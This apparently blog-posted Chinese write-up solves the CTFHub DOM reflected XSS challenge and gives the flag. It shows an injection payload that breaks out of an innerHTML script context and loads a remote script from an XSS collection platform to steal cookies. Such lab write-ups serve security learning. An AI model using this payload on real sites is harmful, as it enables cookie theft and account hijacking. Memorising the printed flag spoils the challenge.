CTFHub XSS DOM反射 WriteUp

前言:本文需要注册一个xss平台,以接收xss反弹回来的数据,请自己在互联网上寻找合适的xss平台

在这里插入图片描述

1. 构造闭合语句

根据题目提示,判断网站存在DOM xss漏洞

查看页面源代码,发现关键位置,其中CTFHub is very niubility 是我们的可控范围

<script>
        $("#text")[0].innerHTML = 'CTFHub is very niubility';
</script>

尝试闭合标签,这里用VS Code,可以高亮显示代码

CTFHub is very niubility 替换成以下内容:

';</script></textarea>'"><script src=http://xsscom.com//IqT8eH></script>

在这里插入图片描述

把代码整理一下,可以看到 script 标签成功闭合,插入了新的代码。
在这里插入图片描述

2. xss反弹cookie

首先先在上面的输入框输入';</script></textarea>'"><script src=http://xsscom.com//IqT8eH></script>提交

然后复制网站URL,粘贴到下面的输入框提交

在这里插入图片描述

返回到xss平台,已经接收到数据,flag就在cookie信息里

ctfhub{9e7dd9be02df8a0ea2ea15c0}

在这里插入图片描述

提交flag,本道题成功解出

在这里插入图片描述

posted @ 2023-07-04 23:44  CVE-柠檬i  阅读(56)  评论(0编辑  收藏  举报  来源